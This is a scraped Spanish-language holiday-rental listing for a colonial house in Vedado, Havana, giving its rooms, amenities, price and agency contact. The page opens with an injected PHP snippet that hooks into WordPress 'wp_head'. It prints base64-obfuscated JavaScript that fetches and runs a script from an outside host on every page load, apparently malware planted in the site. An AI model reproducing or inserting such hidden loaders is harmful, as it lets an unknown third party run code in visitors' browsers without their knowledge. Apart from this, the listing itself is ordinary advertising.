function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Casa Colonial 1923 El mejor Alquiler en La Habana - AlexxaCasas
Casas o Chalet For Alquiler vacacional

Casa Colonial 1923. Disponible

Acerca de esta Casa

 

Esta magnífica casa colonial, se funde al estilo neoclásico de Luis XVI por su gran comodidad. Ubicada en la mejor zona residencial del Vedado, en un barrio tranquilo y rodeado de árboles que brindarán ventilación en todo momento.

Se ubica a tan menos de 10 metros de la Avenida de los Presidentes, a 5 km de la Habana Vieja y a solo 1 km de la Plaza de la Revolución. Los restaurantes el Balcón del Habano y el Gringo Viejo son excelentes propuestas para el disfrute de la comida criolla e internacional.

La casa tiene dos niveles: en el primer nivel con total privacidad se encuentran cuatro habitaciones, salones y terraza; en el segundo nivel podrá disfrutar de un bar privado con todas las bebidas típicas de Cuba, como un genuino café cubano. Además de la terraza con hermosas vistas al vecindario, ideal para descansar.

La casa se describe en:

  • Portal.
  • Recibidor.
  • Salones.
  • Cocina.
  • Cuatro Habitaciones ( camas imperiales )
  • Dos baños con jacuzzi.
  • Baño de servicio
  • Bar.
  • Terraza.
  • Balcones.
  • Garaje.
  • Bar.
  • Billar.

¡Experimentar la tranquilidad y exclusividad con una feliz y agradable estancia en esta casa, es su elección!

Address:
La Habana, Plaza de la Revolución, Vedado, calle 19
Property ID:
118
Parking Description:
Zona de parqueo privada.
Build Material:
Estilo Colonial.
Condition:
Perfectas condiciones, en el centro de la ciudad.
Kitchen:
Equipada con todos los utensilios necesarios.
$200/day
Rooms
4
Bedrooms
6
Bathrooms
2
Year of build
1923
Parking Places
2
Llegada
3 pm
Salida
11 am
Huéspedes
6
Amenities.
  • Adecuado para eventos
  • Agua fría y caliente
  • Aire Acondicionado
  • Área de fumar
  • Balcón
  • Cable TV
  • Caja Fuerte
  • Cena
  • Centro de la ciudad
  • Elementos básicos
  • Entrada privada
  • Garage
  • Internet
  • Jardín
  • Lavandería
  • Limpieza incluida
  • Minibar
  • Refrigerador
  • Teléfono
  • Terraza
  • TV
  • Ventilador
  • Vistas al mar / ciudad

contact the agency.

Agencia AlexxaCasas.

+53 52596154
alexxacasas@gmail.com
Reserva tu alojamiento con

AlexxaCasas.